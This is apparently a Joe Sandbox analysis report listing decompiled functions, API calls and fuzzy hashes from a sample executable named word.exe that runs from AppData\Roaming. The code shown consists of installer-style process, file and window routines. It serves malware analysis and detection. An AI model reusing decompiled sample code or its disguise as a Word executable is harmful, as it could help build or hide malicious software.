                                                          0x00000000
                                                          0x00000000
                                                          0x004064a1
                                                          0x004064a3
                                                          0x004064aa
                                                          0x004064ab
                                                          0x004064ad
                                                          0x004064b0
                                                          0x00000000
                                                          0x00000000
                                                          0x004064b8
                                                          0x004064bb
                                                          0x004064be
                                                          0x004064c0
                                                          0x004064c2
                                                          0x004064c2
                                                          0x004064c3
                                                          0x004064c6
                                                          0x004064cd
                                                          0x004064d0
                                                          0x004064de
                                                          0x00000000
                                                          0x00000000
                                                          0x004067b4
                                                          0x004067b4
                                                          0x004067b7
                                                          0x004067be
                                                          0x00000000
                                                          0x00000000
                                                          0x004067c3
                                                          0x004067c3
                                                          0x004067c7
                                                          0x004068ff
                                                          0x00000000
                                                          0x004068ff
                                                          0x004067cd
                                                          0x004067d0
                                                          0x004067d3
                                                          0x004067d7
                                                          0x004067da
                                                          0x004067e0
                                                          0x004067e2
                                                          0x004067e2
                                                          0x004067e2
                                                          0x004067e5
                                                          0x004067e8
                                                          0x004067e8
                                                          0x004067e8
                                                          0x004067e8
                                                          0x004067eb
                                                          0x004067eb
                                                          0x004067ef
                                                          0x0040684f
                                                          0x00406852
                                                          0x00406857
                                                          0x00406858
                                                          0x0040685a
                                                          0x0040685c
                                                          0x0040685f
                                                          0x0040676b
                                                          0x0040676b
                                                          0x00000000
                                                          0x00406771
                                                          0x0040676b
                                                          0x004067f1
                                                          0x004067f7
                                                          0x004067fa
                                                          0x004067fd
                                                          0x00406800
                                                          0x00406803
                                                          0x00406806
                                                          0x00406809
                                                          0x0040680c
                                                          0x0040680f
                                                          0x00406812
                                                          0x0040682b
                                                          0x0040682e
                                                          0x00406831
                                                          0x00406834
                                                          0x00406838
                                                          0x0040683a
                                                          0x0040683a
                                                          0x0040683b
                                                          0x0040683e
                                                          0x00406814
                                                          0x00406814
                                                          0x0040681c
                                                          0x00406821
                                                          0x00406823
                                                          0x00406826
                                                          0x00406826
                                                          0x00406841
                                                          0x00406848
                                                          0x00000000
                                                          0x0040684a
                                                          0x00000000
                                                          0x0040684a
                                                          0x00000000
                                                          0x004064e6
                                                          0x004064e9
                                                          0x0040651f
                                                          0x0040664f
                                                          0x0040664f
                                                          0x0040664f
                                                          0x0040664f
                                                          0x00406652
                                                          0x00406652
                                                          0x00406655
                                                          0x00406657
                                                          0x004068e1
                                                          0x00000000
                                                          0x004068e1
                                                          0x0040665d
                                                          0x00406660
                                                          0x00000000
                                                          0x00000000
                                                          0x00406666
                                                          0x0040666a
                                                          0x0040666d
                                                          0x0040666d
                                                          0x0040666d
                                                          0x00000000
                                                          0x0040666d
                                                          0x004064eb
                                                          0x004064ed
                                                          0x004064ef
                                                          0x004064f1
                                                          0x004064f4
                                                          0x004064f5
                                                          0x004064f7
                                                          0x004064f9
                                                          0x004064fc
                                                          0x004064ff
                                                          0x00406515
                                                          0x0040651a
                                                          0x00406552
                                                          0x00406552
                                                          0x00406556
                                                          0x00406582
                                                          0x00406584
                                                          0x0040658b
                                                          0x0040658e
                                                          0x00406591
                                                          0x00406591
                                                          0x00406596
                                                          0x00406596
                                                          0x00406598
                                                          0x0040659b
                                                          0x004065a2
                                                          0x004065a5
                                                          0x004065d2
                                                          0x004065d2
                                                          0x004065d5
                                                          0x004065d8
                                                          0x0040664c
                                                          0x0040664c
                                                          0x0040664c
                                                          0x00000000
                                                          0x0040664c
                                                          0x004065da
                                                          0x004065e0
                                                          0x004065e3
                                                          0x004065e6
                                                          0x004065e9
                                                          0x004065ec
                                                          0x004065ef
                                                          0x004065f2
                                                          0x004065f5
                                                          0x004065f8
                                                          0x004065fb
                                                          0x00406614
                                                          0x00406616
                                                          0x00406619
                                                          0x0040661a
                                                          0x0040661d
                                                          0x0040661f
                                                          0x00406622
                                                          0x00406624
                                                          0x00406626
                                                          0x00406629
                                                          0x0040662b
                                                          0x0040662e
                                                          0x00406632
                                                          0x00406634
                                                          0x00406634
                                                          0x00406635
                                                          0x00406638
                                                          0x0040663b
                                                          0x004065fd
                                                          0x004065fd
                                                          0x00406605
                                                          0x0040660a
                                                          0x0040660c
                                                          0x0040660f
                                                          0x0040660f
                                                          0x0040663e
                                                          0x00406645
                                                          0x004065cf
                                                          0x004065cf
                                                          0x004065cf
                                                          0x004065cf
                                                          0x00000000
                                                          0x00406647
                                                          0x00000000
                                                          0x00406647
                                                          0x00406645
                                                          0x00406558
                                                          0x0040655b
                                                          0x0040655d
                                                          0x00406560
                                                          0x00406563
                                                          0x00406566
                                                          0x00406568
                                                          0x0040656b
                                                          0x0040656e
                                                          0x0040656e
                                                          0x00406571
                                                          0x00406571
                                                          0x00406574
                                                          0x0040657b
                                                          0x0040654f
                                                          0x0040654f
                                                          0x0040654f
                                                          0x0040654f
                                                          0x00000000
                                                          0x0040657d
                                                          0x00000000
                                                          0x0040657d
                                                          0x0040657b
                                                          0x00406501
                                                          0x00406504
                                                          0x00406506
                                                          0x00406509
                                                          0x00000000
                                                          0x00000000
                                                          0x00406268
                                                          0x00406268
                                                          0x0040626c
                                                          0x004068b1
                                                          0x00000000
                                                          0x004068b1
                                                          0x00406272
                                                          0x00406275
                                                          0x00406278
                                                          0x0040627b
                                                          0x0040627e
                                                          0x00406281
                                                          0x00406284
                                                          0x00406286
                                                          0x00406289
                                                          0x0040628c
                                                          0x0040628f
                                                          0x00406291
                                                          0x00406291
                                                          0x00406291
                                                          0x00000000
                                                          0x00000000
                                                          0x004063f3
                                                          0x004063f3
                                                          0x004063f7
                                                          0x004068bd
                                                          0x00000000
                                                          0x004068bd
                                                          0x004063fd
                                                          0x00406400
                                                          0x00406403
                                                          0x00406406
                                                          0x00406408
                                                          0x00406408
                                                          0x00406408
                                                          0x0040640b
                                                          0x0040640e
                                                          0x00406411
                                                          0x00406414
                                                          0x00406417
                                                          0x0040641a
                                                          0x0040641b
                                                          0x0040641d
                                                          0x0040641d
                                                          0x0040641d
                                                          0x00406420
                                                          0x00406423
                                                          0x00406426
                                                          0x00406429
                                                          0x00406429
                                                          0x00406429
                                                          0x0040642c
                                                          0x0040642e
                                                          0x0040642e
                                                          0x00000000
                                                          0x00000000
                                                          0x00406670
                                                          0x00406670
                                                          0x00406670
                                                          0x00406674
                                                          0x00000000
                                                          0x00000000
                                                          0x0040667a
                                                          0x0040667d
                                                          0x00406680
                                                          0x00406683
                                                          0x00406685
                                                          0x00406685
                                                          0x00406685
                                                          0x00406688
                                                          0x0040668b
                                                          0x0040668e
                                                          0x00406691
                                                          0x00406694
                                                          0x00406697
                                                          0x00406698
                                                          0x0040669a
                                                          0x0040669a
                                                          0x0040669a
                                                          0x0040669d
                                                          0x004066a0
                                                          0x004066a3
                                                          0x004066a6
                                                          0x004066a9
                                                          0x004066ad
                                                          0x004066af
                                                          0x004066b2
                                                          0x00000000
                                                          0x004066b4
                                                          0x00406431
                                                          0x00406431
                                                          0x00000000
                                                          0x00406431
                                                          0x004066b2
                                                          0x004068e7
                                                          0x00000000
                                                          0x00000000
                                                          0x00405f16
                                                          0x0040691e
                                                          0x0040691e
                                                          0x00000000
                                                          0x0040691e
                                                          0x0040676b
                                                          0x004066f2
                                                          0x004066ef

                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.945445823.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.945441190.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945456325.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945466320.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945471014.000000000040B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945488429.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945497852.0000000000429000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945504833.000000000042C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_word.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 777e71cebdbf5760ca8733070a207fa71ebe7e60942d27e02112710a77df43e6
                                                          • Instruction ID: eed9497ed027258a65708919b4ea66700c8fb804c6c24b7440c20fb41b46c6b0
                                                          • Opcode Fuzzy Hash: 777e71cebdbf5760ca8733070a207fa71ebe7e60942d27e02112710a77df43e6
                                                          • Instruction Fuzzy Hash: 57715671D00229CFEF28CF98C844BADBBB1FB44305F15806AD856BB281D7789A96DF44
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00401E76 Relevance: 4.5, APIs: 3, Instructions: 48synchronizationCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 82%
                                                          			E00401E76() {
				void* _t15;
				void* _t24;
				void* _t26;
				void* _t31;

				_t28 = E00402A85(_t24);
				E00404E9F(0xffffffeb, _t13);
				_t15 = E00405361(_t28); // executed
				 *(_t31 + 8) = _t15;
				if(_t15 == _t24) {
					 *((intOrPtr*)(_t31 - 4)) = 1;
				} else {
					if( *((intOrPtr*)(_t31 - 0x1c)) != _t24) {
						while(WaitForSingleObject( *(_t31 + 8), 0x64) == 0x102) {
							E00405E13(0xf);
						}
						GetExitCodeProcess( *(_t31 + 8), _t31 - 0x3c); // executed
						if( *((intOrPtr*)(_t31 - 0x20)) < _t24) {
							if( *(_t31 - 0x3c) != _t24) {
								 *((intOrPtr*)(_t31 - 4)) = 1;
							}
						} else {
							E00405A52(_t26,  *(_t31 - 0x3c));
						}
					}
					_push( *(_t31 + 8));
					CloseHandle();
				}
				 *0x423fa8 =  *0x423fa8 +  *((intOrPtr*)(_t31 - 4));
				return 0;
			}







                                                          0x00401e7c
                                                          0x00401e81
                                                          0x00401e87
                                                          0x00401e8e
                                                          0x00401e91
                                                          0x004026bf
                                                          0x00401e97
                                                          0x00401e9a
                                                          0x00401eab
                                                          0x00401ea6
                                                          0x00401ea6
                                                          0x00401ec0
                                                          0x00401ec9
                                                          0x00401ed9
                                                          0x00401edb
                                                          0x00401edb
                                                          0x00401ecb
                                                          0x00401ecf
                                                          0x00401ecf
                                                          0x00401ec9
                                                          0x00401ee2
                                                          0x00401ee5
                                                          0x00401ee5
                                                          0x0040291d
                                                          0x00402929

                                                          APIs
                                                            • Part of subcall function 00404E9F: lstrlenA.KERNEL32(0041FD08,?,00000000,?,?,?,?,?,?,?,?,?,?,?,004055E1,000000E5), ref: 00404ED8
                                                            • Part of subcall function 00404E9F: lstrlenA.KERNEL32(?,0041FD08,?,00000000,?,?,?,?,?,?,?,?,?,?,?,004055E1), ref: 00404EE8
                                                            • Part of subcall function 00404E9F: lstrcatA.KERNEL32(0041FD08,?,?,0041FD08,?,00000000,?), ref: 00404EFB
                                                            • Part of subcall function 00404E9F: SetWindowTextA.USER32(0041FD08,0041FD08), ref: 00404F0D
                                                            • Part of subcall function 00404E9F: SendMessageA.USER32 ref: 00404F33
                                                            • Part of subcall function 00404E9F: SendMessageA.USER32 ref: 00404F4D
                                                            • Part of subcall function 00404E9F: SendMessageA.USER32 ref: 00404F5B
                                                            • Part of subcall function 00405361: CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00422538,Error launching installer), ref: 00405386
                                                            • Part of subcall function 00405361: CloseHandle.KERNEL32(?), ref: 00405393
                                                          • WaitForSingleObject.KERNEL32(?,00000064,00000000,000000EB,00000000), ref: 00401EB0
                                                          • GetExitCodeProcess.KERNELBASE(?,?), ref: 00401EC0
                                                          • CloseHandle.KERNEL32(?), ref: 00401EE5
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.945445823.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.945441190.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945456325.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945466320.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945471014.000000000040B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945488429.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945497852.0000000000429000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945504833.000000000042C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_word.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcat
                                                          • String ID:
                                                          • API String ID: 3521207402-0
                                                          • Opcode ID: 63ea715109260620e1cc643b3b38af3e1470e562ac9841a4740e8934b88e8816
                                                          • Instruction ID: 7da7f48acba4dd0e4cefddd12cfcc923695080b3e0b12fbb56f2b87fe8ee5a54
                                                          • Opcode Fuzzy Hash: 63ea715109260620e1cc643b3b38af3e1470e562ac9841a4740e8934b88e8816
                                                          • Instruction Fuzzy Hash: D9012D31D04105EBCB21AFA5DD85A9E7AB5EF40344F14803BFA05B61E1C7BD4A41DF9A
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00403664 Relevance: 4.5, APIs: 2, Strings: 1, Instructions: 19COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 100%
                                                          			E00403664() {
				void* _t1;
				void* _t2;
				void* _t3;
				void* _t6;
				signed int _t11;

				_t1 =  *0x409020; // 0xffffffff
				if(_t1 != 0xffffffff) {
					CloseHandle(_t1); // executed
					 *0x409020 =  *0x409020 | 0xffffffff;
				}
				_t2 =  *0x409024; // 0xffffffff
				if(_t2 != 0xffffffff) {
					CloseHandle(_t2);
					 *0x409024 =  *0x409024 | 0xffffffff;
					_t11 =  *0x409024;
				}
				_t3 = E00405426(_t6, _t11, "C:\\Users\\Albus\\AppData\\Local\\Temp\\nseBFFE.tmp\\", 7); // executed
				return _t3;
			}








                                                          0x00403664
                                                          0x00403673
                                                          0x00403676
                                                          0x00403678
                                                          0x00403678
                                                          0x0040367f
                                                          0x00403687
                                                          0x0040368a
                                                          0x0040368c
                                                          0x0040368c
                                                          0x0040368c
                                                          0x0040369a
                                                          0x004036a0

                                                          APIs
                                                          • CloseHandle.KERNELBASE(FFFFFFFF), ref: 00403676
                                                          • CloseHandle.KERNEL32(FFFFFFFF), ref: 0040368A
                                                          Strings
                                                          • C:\Users\user\AppData\Local\Temp\nseBFFE.tmp\, xrefs: 00403695
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.945445823.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.945441190.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945456325.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945466320.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945471014.000000000040B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945488429.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945497852.0000000000429000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945504833.000000000042C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_word.jbxd
                                                          Similarity
                                                          • API ID: CloseHandle
                                                          • String ID: C:\Users\user\AppData\Local\Temp\nseBFFE.tmp\
                                                          • API String ID: 2962429428-4221711395
                                                          • Opcode ID: 16c7fddc27a42458c1d873a3e0a24777e1257085425b1f33580ea887bd94cc5b
                                                          • Instruction ID: 388c8ae895ed4ea73890f6290ee17e3c52ce59555f833da3370ec015b8cfd073
                                                          • Opcode Fuzzy Hash: 16c7fddc27a42458c1d873a3e0a24777e1257085425b1f33580ea887bd94cc5b
                                                          • Instruction Fuzzy Hash: CCE01235D0472066C628AB7CFE49E553B69AB053357640726F238F62F1C7789C428A5C
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0040327D Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 22fileCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 100%
                                                          			E0040327D(void* _a4, long _a8) {
				int _t6;
				long _t10;

				_t10 = _a8;
				_t6 = ReadFile( *0x409020, _a4, _t10,  &_a8, 0); // executed
				if(_t6 == 0 || _a8 != _t10) {
					return 0;
				} else {
					return 1;
				}
			}





                                                          0x00403281
                                                          0x00403294
                                                          0x0040329c
                                                          0x00000000
                                                          0x004032a3
                                                          0x00000000
                                                          0x004032a5

                                                          APIs
                                                          • ReadFile.KERNELBASE(?,00000000,00000000,00000000,tCPInfo), ref: 00403294
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.945445823.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.945441190.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945456325.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945466320.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945471014.000000000040B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945488429.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945497852.0000000000429000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945504833.000000000042C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_word.jbxd
                                                          Similarity
                                                          • API ID: FileRead
                                                          • String ID: tCPInfo
                                                          • API String ID: 2738559852-2120998202
                                                          • Opcode ID: f91aafd9ec9002b658fe048398ef4ecca8a0f43a27f2371a89b598af4e44343e
                                                          • Instruction ID: fb6a36c91f62b4f1fc6c0be421fc724d0e407ee9a1d4d48bf35ddf6d218f7e68
                                                          • Opcode Fuzzy Hash: f91aafd9ec9002b658fe048398ef4ecca8a0f43a27f2371a89b598af4e44343e
                                                          • Instruction Fuzzy Hash: FAE08C32510219BBCF105E519C00EA73F6CEB093A2F008036F904E5190D238EA10DBA8
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 69%
                                                          			E00401389(signed int _a4, struct HWND__* _a11) {
				intOrPtr* _t6;
				void* _t8;
				void* _t10;
				signed int _t11;
				void* _t12;
				signed int _t16;
				signed int _t17;

				_t17 = _a4;
				while(_t17 >= 0) {
					_t6 = _t17 * 0x1c +  *0x423f50;
					if( *_t6 == 1) {
						break;
					}
					_push(_t6); // executed
					_t8 = E00401434(); // executed
					if(_t8 == 0x7fffffff) {
						return 0x7fffffff;
					}
					_t10 = E0040136D(_t8);
					if(_t10 != 0) {
						_t11 = _t10 - 1;
						_t16 = _t17;
						_t17 = _t11;
						_t12 = _t11 - _t16;
					} else {
						_t12 = _t10 + 1;
						_t17 = _t17 + 1;
					}
					if(_a11 != 0) {
						 *0x42370c =  *0x42370c + _t12;
						SendMessageA(_a11, 0x402, MulDiv( *0x42370c, 0x7530,  *0x4236f4), 0);
					}
				}
				return 0;
			}










                                                          0x0040138a
                                                          0x004013fa
                                                          0x0040139b
                                                          0x004013a0
                                                          0x00000000
                                                          0x00000000
                                                          0x004013a2
                                                          0x004013a3
                                                          0x004013ad
                                                          0x00000000
                                                          0x00401404
                                                          0x004013b0
                                                          0x004013b7
                                                          0x004013bd
                                                          0x004013be
                                                          0x004013c0
                                                          0x004013c2
                                                          0x004013b9
                                                          0x004013b9
                                                          0x004013ba
                                                          0x004013ba
                                                          0x004013c9
                                                          0x004013cb
                                                          0x004013f4
                                                          0x004013f4
                                                          0x004013c9
                                                          0x00000000

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.945445823.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.945441190.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945456325.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945466320.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945471014.000000000040B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945488429.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945497852.0000000000429000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945504833.000000000042C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_word.jbxd
                                                          Similarity
                                                          • API ID: MessageSend
                                                          • String ID:
                                                          • API String ID: 3850602802-0
                                                          • Opcode ID: e415eab16c23440566152ba8713208aa0499868cfc73bd855f0a913c78e047d0
                                                          • Instruction ID: 84a05c9b45cf4c5fa881fbb5f17894f913db592f6cd276ec9e0bf70eb6e0573e
                                                          • Opcode Fuzzy Hash: e415eab16c23440566152ba8713208aa0499868cfc73bd855f0a913c78e047d0
                                                          • Instruction Fuzzy Hash: 1E01F471B242119BE7294F789D05B2A36A8E710325F10823BFA55F66F1D67CDC028B4D
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 004057CB Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 68%
                                                          			E004057CB(CHAR* _a4, long _a8, long _a12) {
				signed int _t5;
				void* _t6;

				_t5 = GetFileAttributesA(_a4); // executed
				asm("sbb ecx, ecx");
				_t6 = CreateFileA(_a4, _a8, 1, 0, _a12,  ~(_t5 + 1) & _t5, 0); // executed
				return _t6;
			}





                                                          0x004057cf
                                                          0x004057dc
                                                          0x004057f1
                                                          0x004057f7

                                                          APIs
                                                          • GetFileAttributesA.KERNELBASE(00000003,00402CC1,C:\Users\user\AppData\Roaming\word.exe,80000000,00000003), ref: 004057CF
                                                          • CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 004057F1
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.945445823.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.945441190.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945456325.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945466320.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945471014.000000000040B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945488429.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945497852.0000000000429000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945504833.000000000042C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_word.jbxd
                                                          Similarity
                                                          • API ID: File$AttributesCreate
                                                          • String ID:
                                                          • API String ID: 415043291-0
                                                          • Opcode ID: 27b1dd0499223472c75b95ee949ae75be2076eeb242b7e9ad2fa61817ef4b739
                                                          • Instruction ID: f93c687e1e26e3b8db63236639f9d4e14dddfc66631b4e0972b173020c912dad
                                                          • Opcode Fuzzy Hash: 27b1dd0499223472c75b95ee949ae75be2076eeb242b7e9ad2fa61817ef4b739
                                                          • Instruction Fuzzy Hash: 8DD09E31658201EFEF098F20DD16F2EBBA2EB84B00F10562CB656940E0D6715815DB16
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 004057AC Relevance: 3.0, APIs: 2, Instructions: 9COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 100%
                                                          			E004057AC(CHAR* _a4) {
				signed char _t3;
				int _t5;

				_t3 = GetFileAttributesA(_a4); // executed
				if(_t3 != 0xffffffff) {
					_t5 = SetFileAttributesA(_a4, _t3 & 0x000000fe); // executed
					return _t5;
				}
				return _t3;
			}





                                                          0x004057b0
                                                          0x004057b9
                                                          0x004057c2
                                                          0x00000000
                                                          0x004057c2
                                                          0x004057c8

                                                          APIs
                                                          • GetFileAttributesA.KERNELBASE(?,004055B7,?,?,?), ref: 004057B0
                                                          • SetFileAttributesA.KERNELBASE(?,00000000), ref: 004057C2
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.945445823.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.945441190.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945456325.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945466320.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945471014.000000000040B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945488429.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945497852.0000000000429000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945504833.000000000042C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_word.jbxd
                                                          Similarity
                                                          • API ID: AttributesFile
                                                          • String ID:
                                                          • API String ID: 3188754299-0
                                                          • Opcode ID: a125b5a99973ee68e412e41cebfce43c29d0215f508127dc280ed1b994480053
                                                          • Instruction ID: 1d3fe654247a7333bacfc0572c6a5cb341717cd3e61d1346c3f88923170604c5
                                                          • Opcode Fuzzy Hash: a125b5a99973ee68e412e41cebfce43c29d0215f508127dc280ed1b994480053
                                                          • Instruction Fuzzy Hash: 95C04C71818501EBD6015B24EF09C1F7F66EB50721B508B35F469E00F0C7359C66EA2A
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 004032AF Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 100%
                                                          			E004032AF(long _a4) {
				long _t2;

				_t2 = SetFilePointer( *0x409020, _a4, 0, 0); // executed
				return _t2;
			}




                                                          0x004032bd
                                                          0x004032c3

                                                          APIs
                                                          • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402EF6,?), ref: 004032BD
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.945445823.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.945441190.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945456325.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945466320.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945471014.000000000040B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945488429.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945497852.0000000000429000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945504833.000000000042C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_word.jbxd
                                                          Similarity
                                                          • API ID: FilePointer
                                                          • String ID:
                                                          • API String ID: 973152223-0
                                                          • Opcode ID: de52c7a2a910bc3da80fb7f00694c34356361307f5662ff296472372640bc7ed
                                                          • Instruction ID: 25801f27feaadc63e0c23ae6d5f917682d27e8bc7d9ad1472eb802ffa7caf717
                                                          • Opcode Fuzzy Hash: de52c7a2a910bc3da80fb7f00694c34356361307f5662ff296472372640bc7ed
                                                          • Instruction Fuzzy Hash: E4B01232954300BFDA114B00DE05F057B72B758700F208030B340380F0C2712420DB0D
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Non-executed Functions

                                                          Function 00404FDD Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 278windowclipboardmemoryCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 90%
                                                          			E00404FDD(struct HWND__* _a4, long _a8, long _a12, unsigned int _a16) {
				struct HWND__* _v8;
				long _v12;
				struct tagRECT _v28;
				void* _v36;
				signed int _v40;
				int _v44;
				int _v48;
				signed int _v52;
				int _v56;
				void* _v60;
				void* _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				long _t87;
				struct HMENU__* _t89;
				unsigned int _t92;
				int _t94;
				int _t95;
				void* _t101;
				intOrPtr _t123;
				struct HWND__* _t127;
				int _t149;
				int _t150;
				struct HWND__* _t154;
				struct HWND__* _t158;
